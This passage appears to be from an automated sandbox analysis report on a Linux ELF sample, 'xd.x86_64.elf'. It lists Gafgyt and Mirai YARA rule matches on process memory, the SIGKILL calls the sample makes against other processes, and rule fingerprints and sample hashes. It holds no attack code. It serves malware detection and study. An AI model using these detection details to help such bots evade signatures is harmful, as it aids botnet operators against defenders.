      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_ea92cca8, Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_0cd591cd, Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_a33a8363, Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_6a77af0f, Author: unknown
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_e0cf29e2, Author: unknown
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: Process Memory Space: xd.x86_64.elf PID: 6260, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6260, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_ea92cca8, Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6262, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6262, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_ea92cca8, Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6263, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6263, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_ea92cca8, Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6264, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6264, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_ea92cca8, Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6265, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6265, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_ea92cca8, Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6266, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6266, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_ea92cca8, Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6268, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, Author: unknown
      Source: Process Memory Space: xd.x86_64.elf PID: 6268, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_ea92cca8, Author: unknown
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 936, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 491, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 720, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 721, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 759, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 761, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 772, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 774, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 777, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 785, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 793, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 797, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 1334, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 1335, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 1344, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 1860, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 1872, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 1886, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 2009, result: no such process
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 2048, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 6056, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 6214, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 6215, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 6368, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 6374, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6261), SIGKILL sent: pid: 6408, result: successful
      Source: /tmp/xd.x86_64.elf (PID: 6263), SIGKILL sent: pid: -6263, result: unknown
      Source: LOAD without section mappings, Program segment: 0x100000
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
      Source: 6266.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6262.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
      Source: 6264.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
      Source: 6263.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = 